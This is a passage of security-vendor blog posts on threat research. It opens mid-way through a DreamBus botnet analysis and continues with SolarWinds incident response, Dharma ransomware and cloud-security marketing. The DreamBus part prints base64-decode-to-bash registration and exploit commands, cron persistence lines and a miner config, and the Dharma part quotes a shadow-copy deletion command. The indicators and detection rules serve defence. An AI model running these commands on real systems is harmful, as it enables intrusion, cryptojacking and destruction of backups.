WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash"],"Interval": "120s"}} The fourth registration request is identical to the second registration request, with the TTL field replaced with the Interval field. PUT /v1/agent/service/register HTTP/1.1 Host: %s:%d User-Agent: consul-api-c Content-Type: application/json Content-Length: %d {"ID": "systemd-service","Name": "systemd-service","Address": "","Port": 8500,"check":{"script": "echo WFJBTkRPTQpleGVjICY+L2Rldi...[snip]...UvZGVyZWdpc3Rlci9zeXN0ZW1kLXNlcnZpY2U7ZG9uZQpjb25zdWwgc2VydmljZXMgZGVyZWdpc3RlciAtaWQ9c3lzdGVtZC1zZXJ2aWNlCg==|base64 -d|bash","Interval": "120s"}} After sending these four registration requests, the DreamBus Consul module will call the deregister command once again with the same parameters as described previously to clean itself up. HashiCorp has published an advisory about the conditions, in which this vulnerability can be triggered, as well as guidance to secure a Consul instance. DreamBus SaltStack module The most recent DreamBus module observed by Zscaler ThreatLabZ targets SaltStack, which is a Python-based open source IT automation framework. The module exploits CVE-2020-11651, which is an authentication bypass that results in full remote command execution as root. This exploit was originally described by F-Secure, who found that there were 6,000 SaltStack servers that were exposed to the internet, and therefore, potentially vulnerable. The DreamBus module performs an initial check to make sure that /usr/bin/curl and /usr/bin/python3 exist on the system and are executable. If they are not present, the module will exit. The module then scans for SaltStack servers on port 4506 on private subnets and the internet ranges – GET / HTTP/1.1 Host: The module checks if the server responds with the bytes ff 00 00 00 00 00 00 00 01 7f. These bytes are representative of the ZeroMQ protocol that is used by SaltStack. If successful, the module will execute a series of commands. It will first create a directory under /tmp/.salted/ and write a Base64-encoded shell script named to this directory and execute it. This script performs a variety of actions. A Base64-encoded string is decoded and written to This is a Python script that contains a copy of an open source proof-of-concept exploit for this vulnerability. Another shell script is created with the name x.px in the /tmp/.salted/ directory. This script contains the code to download the main DreamBus spreader from a hardcoded TOR domain with the path /st.<arch> if the exploit is successful. It will also attempt to delete the files /etc/cron.d/tmp00 and /tmp/.systemd-salt. The script then writes the following lines for a cron job to a file named * * * * * root /bin/bash /tmp/.systemd-salt Next, two shell commands attempt to install the Python packages: msgpack and pyzmq. These packages are dependencies required by the Python-based exploit script that launches the exploit. The Dreambus module launches the exploit three times with the following command lines: python3 -p 4506 -w /tmp/.systemd-salt -f ./x.px $1 python3 -p 4506 -w /etc/cron.d/tmp00 -f ./ $1 python3 -p 4506 -c "echo WFJBTkRPTQpleGVjICY…[snip]...G9uZQo=|base64 -d|bash" -m $1 The first and second command launch the Python exploit script with the same parameters: the port number of the SaltStack server (with the -p option), the file from the Salt Master to write (with the -w option), the content of the file to write (with the -f option), and the IP address of the server to target. The differences between the two commands are that the first command writes the content of the file x.px to /tmp.systemd-salt, while the second command writes the content of the file to /etc/cron.d/tmp00. This allows DreamBus to establish persistence on the compromised SaltStack server. The third command launches the exploit script with the port, a command to execute (with the -c option), a flag to run the command on all active minions (with the -m option), and the IP address of the SaltStack server. The command consists of the same Base64 encoded content as the file x.px that downloads the main Dreambus spreader module. Finally, the files (the Python-based exploit script), (the temporary cron job), (the main Base64 encoded shell script), and x.px (main spreader module script) are deleted to hide the exploitation. Additional DreamBus modules Prior open source reporting has also identified modules that have been deployed by DreamBus that target Apache Fink and Jenkins. DreamBus XMRig Monero miner module The current monetization vector for DreamBus is through mining a cryptocurrency known as Monero (XMR), which is a popular alternative to Bitcoin due to its improvements in anonymity. At the time of publication, the value of Monero is up over 100 percent in the past year, further increasing the threat actor’s profits. To mine Monero, DreamBus downloads an XMRig module through the /cpu command. The XMRig module is compiled regularly with the most recent version, XMRig 6.7.1, built on January 15, 2021. The XMRig configuration specifies a mining pool to use the infected system’s CPU to mine Monero cryptocurrency. An example hardcoded configuration is shown below: { "api": { "id": null, "worker-id": null }, "http": { "enabled": false, "host": "", "port": 0, "access-token": null, "restricted": true }, "autosave": true, "version": 1, "background": true, "colors": true, [snip] "cpu": { "enabled": true, "huge-pages": true, "huge-pages-jit": false, "hw-aes": null, "priority": null, "memory-pool": false, "yield": true, "max-threads-hint": 100, "asm": true, "argon2-impl": null, "astrobwt-max-size": 550, "cn/0": false, "cn-lite/0": false, "kawpow": false }, [snip] "donate-level": 5, "donate-over-proxy": 1, "log-file": null, "pools": [ { "algo": null, "coin": "monero", "url": "", "user": "x", "pass": "x", "rig-id": null, "nicehash": true, "keepalive": true, "enabled": true, "tls": false, "tls-fingerprint": null, "daemon": false, "self-select": null [snip] ], "print-time": 60, "health-print-time": 60, "retries": 5, "retry-pause": 5, "syslog": false, "user-agent": null, "watch": true, "pause-on-battery": false } Attribution The threat actor behind DreamBus is likely located in or near Russia based on the time when new commands are pushed out. Updates and new commands are issued that typically start around 6:00 a.m. UTC or 9:00 a.m. Moscow Standard Time (MSK) and end approximately at 3:00 p.m. UTC or 6:00 p.m. MSK. Conclusion While DreamBus is currently used for mining cryptocurrency, the threat actor could pivot to more disruptive activities such as ransomware. In addition, other threat groups could leverage the same techniques to infect systems and compromise sensitive information that can be stolen and easily monetized. The DreamBus threat actor continues to innovate and add new modules to compromise more systems, and regularly pushes out updates and bug fixes. The threat actor behind DreamBus is likely to continue activity for the foreseeable future hidden behind TOR and anonymous file-sharing websites. Therefore, organizations must be vigilant and take the necessary precautions to prevent infections. There are a number of best practices that organizations can take to prevent attacks. These include properly securing all applications that are both publicly and privately accessible. Strong passwords should always be used to secure internet services, and SSH public key authentication can be further strengthened by requiring a password to decrypt the private key. Organizations should also deploy network and endpoint monitoring systems to identify compromises and be mindful of systems that engage in bruteforce attacks, which are typically very noisy. Detections Zscaler’s multilayered cloud security platform detects indicators at various levels, as shown below: ELF32.Coinminer.DreamBus ELF32.Coinminer.XMRig Linux.Worm.SSHSpreader MITRE ATT&CK Table Tactic Technique T1133 External Remote Services T1090 Proxy T1110 Brute Force T1190 Exploit Public-Facing Application T1210 Exploitation of Remote Services T1078 Valid Accounts T1552 Unsecured Credentials T1592 Gather Victim Host Information T0011 Command and Control T1053 Scheduled Task/Job T1496 Resource Hijacking Indicators of Compromise (IOCs) The following IOCs can be used to detect a DreamBus infection. Samples SHA256 Hash Module Name e78fc101133d1803cd462b68058c5c238f56b1fe9416e5997cfe7d44947092a2 PostgreSQL Spreader x86 2556c8cedd6f0ff7d16be9093bbfd0e86ede3e47fab13dfeb8d3964f10b18ea4 PostgreSQL Spreader x64 0e726a4fff8efeff3fdd127bed6ed28d5f51ff2c4f1e40a267984f7edae8e7d3 Apache Spark Spreader x64 636accbee3f2163945886fa8f68c74449eb3d54769a1747728197e7804339b91 HashiCorp Consul Spreader x64 f0ded99a521dc8be2b331fe7cdfff56d428ba3a4882d25eac9b7f7b9cefeea3d Hadoop YARN Spreader x64 33b0b3649faa07f9b62727f24a09ee5edc6b0ffc00e1a57633166abf7783fc7b SaltStack Spreader x64 aa38ca6252eee5c7a2cb51a7a2fe8b2660145ca5717f462ca83248bec5929608 XMRig Miner x64 378253939be1eded3fc70c70d8d8471b90e4a8da917bc2ed412175e906555673 Redis Spreader x64 (Auth) 71efa6b7dafc8c6af2aa5579f0358161308c56a3a6c3b947f53410415675e261 Redis Spreader x64 (No Auth) 8f82943f33ab4dd5979b7654d0402e256334c96d962d13de1bddebb9bc54f994 Main Spreader x64 030c5dec24dc8fafff71dc4f0b68ef80b23bd1a276cd76c9530e26ac1e273412 SSH Spreader TAR file Network Indicators Domain / IP Address Description dreambusweduybcp.onion TOR domain for commands qsts2vqotnlh2h5xwa7fp3iopb7h7cngknjjo4f4sxhrwcqgughipxid.onion TOR domain for modules i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad.onion TOR domain for modules nssnkct6udyyx6zlv4l6jhqr5jdf643shyerk246fs27ksrdehl2z3qd.onion TOR domain for modules ojk5zra7b3yq32timb27n4qj5udk4w2l5kqn5ulhnugdscelttfhtoyd.onion TOR domain for modules ji55jjplpknk7eayxxtb5o3ulxuevntutsdanov5dp3wya7l7btjv4qd.onion TOR domain for modules bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd.onion TOR domain for modules 4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad.onion TOR domain for modules sg722jwocbvedckhd4dptpqfek5fsbmx3v57qg6lzhuo56np73mb3zyd.onion TOR domain for modules 25wlksd35c2fs55rnhlcfz3jjaujxmbmfkvrxeu7tkgnnesdhh3gghqd.onion TOR domain for modules Monero mining pool Monero mining pool Monero mining pool Monero mining pool Hosts various DreamBus components Host Indicators Filenames Description Main Spreader Script Main Spreader Script 0systemd-service Main Spreader Script /tmp/.X11-unix/sshd DreamBus SSH bruteforce spreader module TAR file /tmp/.X11-unix/01 DreamBus main module lock file /tmp/.X11-unix/22 DreamBus module lock file /etc/cron.d/systemdd DreamBus Redis module cron /etc/cron.d/tmp00 DreamBus SaltStack module cron /tmp/.salted/ DreamBus SaltStack exploit temporary directory /tmp/.systemd-salt DreamBus SaltStack backdoor Yara rules These rules are valid on unpacked DreamBus binaries. rule dreambus_module { strings: $ = "/tmp/.X11-unix/22" $ = "" $ = "" $ = "" condition: all of them } rule dreambus_main { strings: $ = "/tmp/.X11-unix/01" $ = "/dev/null" $ = {2D 63 00 2F 62 69 6E 2F 73 68 00} $ = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" condition: all of them } Snort rules alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Command Request"; flow:established,to_server; content:"GET"; http_method; content:"/cmd"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Command Request"; flow:established,to_server; content:"GET"; http_method; content:"/trc"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus Beacon Request"; flow:established,to_server; content:"GET"; http_method; content:"/bot"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"Zscaler TROJAN DreamBus XMRig Request"; flow:established,to_server; content:"GET"; http_method; content:"/cpu"; http_uri; content:"User-Agent: -"; http_header; classtype:trojan-activity; rev:1;) Fri, 22 Jan 2021 05:00:01 -0800 Brett Stone-Gross The Four Critical Protection Points in your Cloud Attack Surface Your attack surface represents all of the different ways that an attacker can gain access to sensitive data and compromise applications that your organization is trying to protect. There are hundreds of different attack vectors that an attacker can leverage to gain access to an organization—everything from compromised credentials and social engineering to more advanced techniques like exploiting a zero-day vulnerability. Unfortunately for the good guys, the bad guys only need to find one weakness to exploit to make their way in. And they have hundreds of attack vectors to choose from! The solution? Make your attack surface as small as possible, thereby limiting the number of places attack vectors can be put to use. This strategy works as well for your public cloud deployments as it does elsewhere in your organization. There are four key components of your public cloud attack surface that should be minimized: Platforms Workloads Inbound Connectivity Outbound Connectivity 1. Platforms Start by understanding the security posture of the underlying platform(s) for your cloud environment. If you’re using one of the three major cloud platforms (AWS, Azure, GCP), your concern should largely revolve around your organization’s use of these platforms rather than around security of the platforms themselves. These providers have invested heavily in security, have gone through every certification available, and their platforms have been tested by tens of thousands of organizations. What they can’t ensure, however, is that your organization has securely configured their many features and services. If you search the term “AWS S3 exposure,” you’ll find plenty of articles about enterprises that have made disastrous configuration mistakes, resulting in embarrassing and costly incidents. To analyze your configurations, you want to start by getting a comprehensive inventory of everything across your entire cloud footprint, including IaaS, PaaS, containers, serverless, and more. Because cloud platforms are dynamic, you want continuous monitoring so that you’re always aware of changes. From there, map your inventory to the set of policies your organization has put into place to minimize the risk of exposure resulting from the insecure configuration of a cloud platform. Obviously, you don’t want to publicly expose S3/storage buckets, but there are a number of other policies you can enact that will go a long way towards eliminating your exposure to the hundreds of attack vectors mentioned earlier in this post. Finally, you want to put automatic remediation into place whenever possible. This will help ensure that, when changes occur, your configuration remains aligned to your policies. 2. Workloads Even if you’ve properly configured the cloud platform, using identity-based workload segmentation is critical to further minimizing your attack surface to stop lateral threat movement. This step minimizes the potential damage that attackers can cause if they do make their way in. Bad actors can wreak havoc on flat networks that allow unchecked lateral movement. But segmenting a network using the typical approach—network-based firewall policies—is unmanageably complex, leading to human error and exposed workloads. Workload-identity verification ensures that you are limiting access only to known applications and services, and you want to ensure that you’re verifying the actual software in question, down to the sub-process level. For example, it’s not enough to simply allow or block Python scripts. You want to allow the specific Python scripts that are needed to make your applications operate properly and block everything else. From there, identity-based segmentation ensures that all network paths that aren’t necessary for the proper functioning of your business applications are eliminated. The result? Only known and verified software is able to communicate, and only where it absolutely needs to communicate on approved pathways. 3. Inbound connectivity Zero trust remote access has quickly become the preferred method for remote user connectivity, and cloud workload access is no exception. With zero trust, applications are never exposed to the internet, making them invisible to unauthorized users. Invisibility is a superpower that everyone wants, and zero trust delivers! Whether you have a privileged user managing an application with Secure Shell (SSH), or a business partner accessing a web-based application, zero trust allows you to provide access to applications, not to your network, thereby limiting potential threats from the outside. With this technique, even authorized users aren’t provided unfettered network access. They get access only to the applications they need to do their jobs, and nothing more. 4. Outbound connectivity There are two forms of connectivity for most cloud workloads: cloud-to-internet and cloud-to-other-clouds or private data center. Cloud workloads require internet access for a variety of reasons, including software update services and API connectivity to other applications. Unfortunately, providing direct access to the internet increases risk. Ensuring that internet access goes through a security intermediary that can scan for malware and other forms of malicious traffic can reduce the risk of an internet-based attack. Secure communications to other clouds and data centers is another important aspect of minimizing your cloud attack surface. As with user access, zero trust principles should be applied, ensuring that applications can securely connect to other applications, not networks. By eliminating open network connectivity, you can ensure that even if an application is compromised, the attacker’s ability to do damage across your cloud footprint is severely limited. Minimize your cloud attack surface with Zscaler Cloud Protection Zscaler Cloud Protection (ZCP) was designed from the ground up to minimize the attack surface and take the complexity out of securing your cloud footprint. The result is tighter security with lower costs and dramatically reduced complexity. Contact us to learn more or to schedule a custom demo of Zscaler Cloud Protection. Tue, 05 Jan 2021 08:00:02 -0800 Rich Campagna The Hitchhiker’s Guide to SolarWinds Incident Response On December 13, 2020, multiple security vendors in conjunction with CISA disclosed a software supply-chain attack involving the SolarWinds Orion platform. The disclosure detailed the activities of an advanced persistent threat (APT) adversary that was able to gain access to SolarWinds systems to create trojanized updates to the Orion platform between March 2020 and possibly as recently as December 2020. The trojanized updates included a custom, digitally signed backdoor called SUNBURST. SolarWinds Orion is a widely used network infrastructure monitoring and management platform with a reported customer base of over 18,000. The following versions may be affected: Orion Platform 2019.4 HF5, version 2019.4.5200.9083 Orion Platform 2020.2 RC1, version 2020.2.100.12219 Orion Platform 2020.2 RC2, version 2020.2.5200.12394 Orion Platform 2020.2, 2020.2 HF1, version 2020.2.5300.12432 At this time, the full scope of the attack remains under investigation. What is known is that the attack was executed by a truly sophisticated adversary with a deep understanding of operational security and complex tradecraft. Based on publicly available data, this adversary demonstrated significant efforts to evade, obfuscate, and clean-up using techniques such as steganography, fingerprinting techniques to identify both target systems as well as analysis systems, rotating infrastructure with a focus on geolocation proximity, as well as executing code in memory as much as possible. These techniques, in combination with using a digitally signed component of a trusted software platform as the initial infection vector, are indicative of a highly skilled and covert adversary willing to expend resources to assure the success of their operation. Zscaler suggests that all organizations should take several immediate actions, described below, in addition to reviewing the existing security policies and best practices available to Zscaler customers. These actions are recommended for any organization that may be impacted by the SolarWinds event. They are not intended to be a comprehensive guide to all actions that an organization may take, and each organization should perform its own due diligence to assess impact and risk. Investigation Organizations should immediately identify all systems that may have SolarWinds Orion installed. Once the systems are identified, the version should be checked against the list of impacted versions. Depending on the result of the version(s) installed, additional responses may be required. Even if a version is not found on the impacted version list, it may be prudent to perform cursory checks to confirm there is no impact to the organization. If an affected version of Orion is found, that system should be immediately taken offline and all network traffic blocked inbound and outbound. Any system or user accounts associated with the affected system should be disabled and reviewed for legitimacy as well as access. If possible, a forensics image of the affected system should also be collected. Network activity Based on public reporting, a SolarWinds Orion system affected by this event—meaning that the SUNBURST backdoor had been successfully installed—would begin network communication to its first stage command and control (C&C) server at avsvmcloud[.]com. While this activity does indicate that the affected system was within the target radius of the attack, it does not confirm additional compromise or post-exploitation actions. Zscaler Internet Access (ZIA) customers may be able to perform this search within the DNS Insights or Web Insights area in the portal, or within the log aggregator/SIEM of choice where ZIA logs are sent. This data will however be limited to systems that have their network traffic routed to ZIA. The following network indicators may be used to perform a sweep for a timeframe extending back to March 2020 or further to discover possible compromised systems (note: additional indicators may be discovered as additional data is disclosed). Domains avsvmcloud[.]com digitalcollege[.]org freescanonline[.]com deftsecurity[.]com thedoccloud[.]com websitetheme[.]com highdatabase[.]com incomeupdate[.]com databasegalore[.]com panhardware[.]com zupertech[.]com seobundlekit[.]com lcomputers[.]com virtualdataserver[.]com webcodez[.]com infinitysoftwares[.]com ervsystem[.]com bigtopweb[.]com - Added 1/20/21 in relation to RainDrop IPs All other internet-bound destinations from the Orion system should also be examined. Additionally, all network activity originating from SolarWinds Orion systems to other internal systems should be reviewed for potential lateral movement. This may prove challenging as most Orion deployments likely allow it to have privileged access across the network to a variety of systems. However, it may be possible to carve out a smaller set of data to initially analyze by suppressing known-good or expected behaviors from the potentially affected Orion system. Endpoint The SUNBURST backdoor is a digitally signed DLL file with a specific filename and hash. The existence of this file on an Orion server is indicative that the adversary was able to gain unauthorized access to the system. Additional post-exploitation behaviors may have been performed by the adversary, indicating a successful intrusion. The following indicators and behaviors may assist in confirming a compromise. MD5 hashes b91ce2fa41029f6955bff20079468448 d5aad0d248c237360cf39c054b654d69 2c4a910a1299cdae2a4e55988a2f102e 846e27a652a5e1bfbd0ddd38a16dc865 Filename SolarWinds.Orion.Core.BusinessLayer.dll Behaviors Modification of system tasks delete-create-execute-delete-create directory action pattern Newly created or unknown local user accounts Existence or evidence of usage of Adfind.exe Signs of cmd.exe or rundll32.exe spawned from solarwinds.businesslayerhost.exe Existence of unknown and/or very broad email forwarding/deleting rules on the email gateway User account activity Once SUNBURST has been deployed, the adversary will most likely begin to perform reconnaissance actions using the privileges of the Orion system and explore what is available in terms of additional assets to compromise or actions to take. The following behaviors may have been observed on the affected Orion system or other systems that have had communication with the affected system. Anomalous logins or repeated failed authentication to internal systems Logins from unknown or unrecognized external sources to internal systems Extremely long duration tokens, which may indicate malicious activity (examine SAML tokens for duration) Zscaler is here to help As described in our ThreatLabZ blog post, Zscaler immediately deployed protections to all customers and continues to deploy additional protections and countermeasures as more information becomes available. In addition, as we had disclosed in our Trust Advisory, Zscaler was not impacted by this event. This may, however, be an opportunity for organizations to reassess their security policies and confirm alignment with documented best practices and recommended policies as described within our documentation, which covers recommendations, such as: Enable SSL inspection where possible | SSL Best Practice Guide Enable Advanced Threat Protection (ATP) and its associated features | Recommended Policy Enable Advanced Cloud Sandbox with AI-Driven Quarantine | Recommended Policy Enable Advanced Cloud Firewall with Cloud IPS | Recommended Policy Enable Cloud Browser Isolation where possible | About Cloud Browser Isolation Restrict access to specific URL categories with legitimate business use cases | Recommended Policy Restrict access to specific file-types with legitimate business use cases | Recommended Policy Configure DNS Control | About DNS Control Request your complimentary SolarWinds security assessment Zscaler has your back. Engage with our security experts to gain insight into the SolarWinds attacks and get hands-on best practices guidance to better protect your users, applications, and systems: Tue, 22 Dec 2020 17:32:32 -0800 Bryan Lee Ransomware Delivered Using RDP Brute-Force Attack Zscaler ThreatLabZ recently published a report on the 2020 State of Public Cloud Security that showed security misconfiguration to be the leading cause of cyberattacks against public cloud infrastructure. In this blog, we will look at one of the commonly abused security misconfigurations—the RDP service port left open to the internet—and how cybercriminals abuse it. Brute-forcing RDP (Remote Desktop Protocol) is the most common method used by threat actors attempting to gain access to Windows systems and execute malware. The reason is simple: In our public cloud threat research, we have observed that 70 percent of systems keep RDP ports open in the public cloud. Threat actors scan for these publicly open RDP ports to conduct distributed brute-force attacks. Systems that use weak credentials are easy targets, and, once compromised, attackers sell access to the hacked systems on the dark web to other cybercriminals. Ransomware groups such as SamSam and Dharma have been spreading almost exclusively via RDP for years. In this case study, we will look at Dharma ransomware attacks. Dharma, also known as Crysis, has been distributed under a ransomware-as-a-service (RaaS) model since 2016. Its source code was up for sale in March 2020, making it available to a wider spectrum. Infection chain Attackers use open-source port-scanning tools to scan for exposed RDP ports online and then try to gain access to a system using brute-force tools or stolen credentials purchased from the dark web. After attackers gain access to the target system, they go on to make the system vulnerable by deleting backups, disabling antivirus software, and changing configuration settings. Once the security is disabled and the network vulnerable, attackers deliver malware payloads. The process involves installing ransomware, using infected machines to distribute spam, deploying keyloggers, or installing backdoors to be used for future attacks. The below figure shows the infection cycle of Dharma ransomware delivered via RDP brute-force attack. Figure 1: Infection chain of RDP brute-force attack delivers Dharma ransomware Once the attacker gains access to the machine, the following files are uploaded: %temp%\ns.exe – Network enumeration/scanning tool %programfiles%\process hacker\ – Process hacker tool ns.exe is a network enumeration and scanning tool used by attackers to scan SMB shares, open ports, and services through which they can move within the network. Process Hacker is a program used mostly by system administrators for monitoring, debugging, and troubleshooting, but in this case, it was used for malicious purposes such as disabling AV or services. Following the pre-execution process, the attacker uploads a ransomware file and executes it. Technical details Once executed, this variant of Dharma ransomware uses the below commands to quietly delete all of the shadow volume copies on the machine. mode con cp select=1251 vssadmin delete shadows /all /quiet Exit For persistence, the ransomware executes the following commands: Copy the file to %windir%system32 or %appdata% and set 'LOCAL_MACHINE/LOCAL_USER Software\Microsoft\Windows\CurrentVersion\Run' Copy file to 'Startup' folder Copy file to 'Common Startup’ folder The ransomware encrypts files with the following extensions: Figure 2: File extensions to encrypt The ransomware encrypts files using an AES 256 algorithm. The AES key is also encrypted with an RSA 1024 algorithm. This encrypted AES key is stored at the end of the encrypted file along with the filename. The name of the encrypted files have the following pattern: [Filename].id-{8 bytes ID}.[recovery_email].zimba Figure 3: Encrypted files After encrypting the files, the ransomware pops up two different ransom notes on the victim’s computer. One is the Info.hta file, which is launched via autorun when a user logs into the computer. Figure 4: info.hta The other note is called FILES ENCRYPTED.txt and can be found on the desktop. Figure 5: FILES ENCRYPTED.txt Lateral movement Dharma ransomware uses typical methods for obtaining credentials and propagating laterally within a network. In most cases, it uses the Mimikatz tool, which allows it to dump the network share credentials, and in other cases, it uses NirSoft CredentialsFileView, which allows for the recovery of passwords stored in encrypted credential files. The obtained credentials are used to attempt lateral movement inside the on-prem as well as public cloud infrastructure. In some cases, the ransomware tries to spread through the network by taking advantage of the compromised Domain Controller and deploying a Default Domain Policy that will run the ransomware payload on StartUp for each machine. Conclusion Since Dharma ransomware is usually installed by gaining access to Remote Desktop Services, it is important to ensure that those services are properly locked. This includes ensuring that computers running Remote Desktop Services do not connect directly to the internet. Instead, organizations should use a zero trust architecture to allow remote users to securely access these servers without exposing them to the entire internet. While applying security patches is always important, most RDP-based attacks rely on cracking weak credentials, so passwords should be long, unique, and random. It’s important for enterprises to establish password requirements and train employees to use strong passwords. Attackers typically identify potential targets by scanning the internet for systems listening on the default RDP port (TCP 3389). Changing the listening port via Windows Registry can help organizations hide vulnerable connections. MITRE ATT&CK tactic and technique mapping Tactic Technique T1190 Exploit Public-Facing Application T1059 Command Line Interface T1061 Graphical User Interface T1547 Boot or Logon Autostart Execution T1037 Startup Items T1110 Brute Force T1003 Credential Dumping T1083 File and Directory Discovery T1135 Network Share Discovery T1018 Remote System Discovery T1063 Security Software Discovery T1076 Remote Desktop Protocol T1105 Remote File Copy T1486 Data Encrypted for Impact Fri, 08 Jan 2021 10:00:01 -0800 Mohd Sadique Intelligent Patient-Zero Prevention Powered by AI During 2020, Zscaler brought significant innovations to our Zero Trust Exchange, the Zscaler cloud platform that powers all Zscaler services, including further evolving our inline Advanced Cloud Sandbox. We are excited to close out the year with the introduction of the world’s first AI-driven quarantine engine for Cloud Sandbox, further extending the strong malware protection we deliver to our customers. In the early days of sandboxing technology, customers used it to detect unknown malware missed by traditional signature-based technologies. It worked well for many instances of unknown malware. But one of its gaps was the ability to stop patient-zero infections: by the time the sandbox detected an emerging threat, the first instance had already arrived at the endpoint. To solve the patient-zero challenge, Zscaler reinvented malware analysis a few years ago by adding the ability to quarantine suspicious content inline, which is only possible due to our unique proxy architecture. With this capability, customers could prevent "patient-zero" incidents when using the quarantine policy on files going through the Zscaler cloud. However, quarantining can introduce a delay in the delivery of legitimate files, and we are always striving to improve the user experience. To solve this pain point, the Machine Learning, Cloud Sandbox, and Security Research teams at Zscaler reimagined the quarantine capability with an inline AI model that significantly reduces wait times, ensuring that customers can benefit from the added security of quarantine without impacting their users or operations. The AI model recommends “quarantine” for high-risk, unknown threats in real time, resulting in: Better security: Some customers did not want to turn on quarantine, risking potential patient-zero infections from unknown malware. Now, the inline AI model will make the quarantine verdict in real time, so customers get more comprehensive protection. Better user experience: In the past, some users experienced delays while waiting for clearance on quarantined files. Now, the inline AI model allows low-risk files through, while detonating the content in parallel. The industry never believed it would be possible to simultaneously achieve real-time speed and comprehensive coverage. Traditional AV signature methodology is fast but doesn’t provide wide enough coverage for emerging threats. Sandboxes cover emerging threats, but they are not super-fast. Customers were often forced to choose, sometimes resulting in a reduced security posture. Traditional sandbox vendors lack the cloud-native proxy architecture required for inline quarantine, preventing them from offering this critical capability. But with the new AI-powered Cloud Sandbox, Zscaler customers get inline quarantine for the majority of their files—without user impact. We demonstrated our research into the AI-powered Cloud Sandbox capabilities with a Fortune 500 customer, National Oilwell Varco (NOV), at Zenith Live in 2019. The diagram below shows that out of a total of 5,765 files during the 20-day research period, 5,249 (91percent) got the instant quarantine verdict result (all correct). Those are the files that can be quarantined with no delay to the user. As the Co-founder/CEO of TrustPath, acquired by Zscaler two years ago, the productization of inline intelligent patient-zero prevention in the Zscaler Cloud Sandbox marks the second integration milestone within the Zscaler family. It is a truly special and proud moment for my team and myself. From the beginning, we have had a dream to deliver both “better security” and “better user experiences” at the same time by leveraging Machine Learning and AI. And now, our dream has come true inline with the Zscaler Zero Trust Exchange, the industry’s largest inline security cloud that processes and protects over 140 billion transactions per day! Tue, 22 Dec 2020 08:00:01 -0800 Howie Xu Seven Reasons Why Your Cloud Security is a Mess The term “viral” is most commonly associated with consumer-related content, apps, etc., that rapidly grow in popularity as they spread from one person to the next. But pioneering enterprise software companies have also been able to leverage virality to achieve high growth. One of the earliest successful examples was when Dropbox offered free storage space in exchange for referrals. Then came Slack, growing via word of mouth with no particular incentive other than the ability to communicate with colleagues in a compelling new way. More recently, cloud platforms, such as AWS, GCP, and Azure, have enjoyed similar “viral” effects inside organizations. Sure, many enterprises have progressive leaders who have embraced a “cloud-first” model, but for others, the growth of cloud has been organic and user-led, much like Dropbox and Slack's early days. While cloud platforms bring a range of benefits to organizations and users alike, they can also introduce challenges to networking and security teams. Let's review the seven reasons why securing rapidly expanding cloud activity has become overly complex and ineffective. 1. It starts with a relatively simple deployment in a single AWS region, spun up for a new project by an application development team. Unfortunately, well-intentioned developers often miss basic security configurations, leaving this environment susceptible to breach. 2. A new developer joins the team from a cloud-first startup that had widely adopted AWS but hadn’t done much to enforce security. Because the environment is user-controlled, this developer spins up a new, previously unknown VPC with no security policies applied to it. 3. New security components get added to manage the traffic between these VPCs. Everything is in the same region and has no external connectivity so, despite a bumpy start, this deployment is still relatively simple. 4. The organization decides to make the applications and the environment accessible to a broader range of users, which means the addition of several security appliances to the environment, including multiple virtual firewalls and VPNs. This is where things really start to get complicated—managing static, network-based policies and dealing with the scaling limitations of IPSec VPNs. 5. Several of your now-growing inventories of workloads need internet access for things like software updates and API connections to third-party services. Of course, you want to protect your environment from malicious software and other internet-based threats, so you put up more virtual firewalls, increasing management time and overhead. 6. As your cloud environment grows further, you also add more regions and start to deploy to other cloud platforms. This expansion leads to more vFW policies, more IPSec VPNs, and even more complication, because now you’re dealing with not one, but multiple cloud platforms, each of which has its own way of dealing with connectivity and security services. 7. Now that you’ve deployed into other cloud platforms, you need to recreate your build-out of security from scratch, ensuring that your new environment is locked down just like your original deployment. A better approach Zscaler Cloud Protection (ZCP) was built to take the work out of securing cloud workloads. The solution is designed to deliver the same high performance, globally distributed reliability that you’ve come to trust from Zscaler. ZCP is deployed via easy-to-understand business-level policies and a simplified security stack, resulting in better security, a 90 percent reduction in policies, 90 percent fewer services to manage and maintain, and cost reductions of 30 percent or more. Complexity is the enemy of security It’s long been said that complexity is the enemy of security, but most organizations have found it too difficult to unwind the complexity that has built up over time in their on-premises and data center environments. The move to the cloud is your once-in-a-career opportunity to eliminate complexity from your environments. A cloud protection platform based on zero trust is the way to do that. Zscaler can help you get there. Tue, 15 Dec 2020 11:50:39 -0800 Rich Campagna Cybersecurity Past, Present, and Future: ThreatLabZ Looks at 2020 and the Year Ahead Welcome to the end of 2020. The close of every year brings a lot of online activity—especially now, with everyone at home and socially distancing. Unfortunately, even as people stay at home to protect themselves, they are not safe from threat actors—who are busy developing exploits targeted at people working and shopping online. In keeping with the season, let’s take a page from a famous holiday story and look at the past, present, and future of cybersecurity findings by the ThreatLabZ team. Past reports Throughout 2020, the ThreatLabZ team published research collected from data in the Zscaler Zero Trust Exchange global cloud. Below are the five most-read stories we reported: In March, ThreatLabZ researchers detected several WordPress and Joomla sites serving Shade/Troldesh ransomware, backdoors, redirectors, and a variety of phishing pages. The most well-known threats to CMS sites result from vulnerabilities introduced by plugins, themes, and extensions. WordPress and Joomla have become popular for malicious actors to target sites on these platforms for hacking and injecting malicious content. In August, ThreatLabZ observed a malicious site that used LinkedIn as the lure for a social engineering scheme designed to steal a user’s credentials and spread malicious binaries. In September, Zscaler ThreatLabZ posted about the rise in Microsoft Azure domains to host phishing attacks and similar activity 